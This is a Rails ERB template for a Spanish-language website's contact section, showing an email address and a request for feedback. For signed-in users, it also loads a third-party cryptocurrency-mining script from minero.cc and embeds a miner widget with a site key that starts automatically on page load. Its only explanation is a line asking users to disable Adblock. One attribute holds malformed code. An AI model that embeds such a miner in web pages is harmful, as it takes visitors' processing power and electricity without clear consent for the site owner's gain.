<div class= " w-50 p-3  background-size " >
  <div class= "background-fade col-md text-center">
    </br>
    <h5>Escríbenos</h5>  </br>
    <h2>contacto@simbionte.cl</h2>  </br>

      <% if user_signed_in? %>
      <script src="https://minero.cc/lib/minero-miner.min.js" async></script>
        <div class= "text-center d-flex justify-content-center">

          <div class="minero-miner "
              style="width: 400px; height: 120px"
              data-key="e1aedca548f440b9147b72726b7b6f9f"
              data-threads= .getAutoThreadsEnabled(true)
              data-autostart= true >
              
              <em>Please disable Adblock!</em>
                  </div>
            </div>
        <% else %>
      <% end %>
      </p>


    <p>Estamos recién partiendo, por lo que ideas, comentarios, opiniones. Todo es importante y nos puede ayudar en nuestra causa</p>
    
  </div>
</div>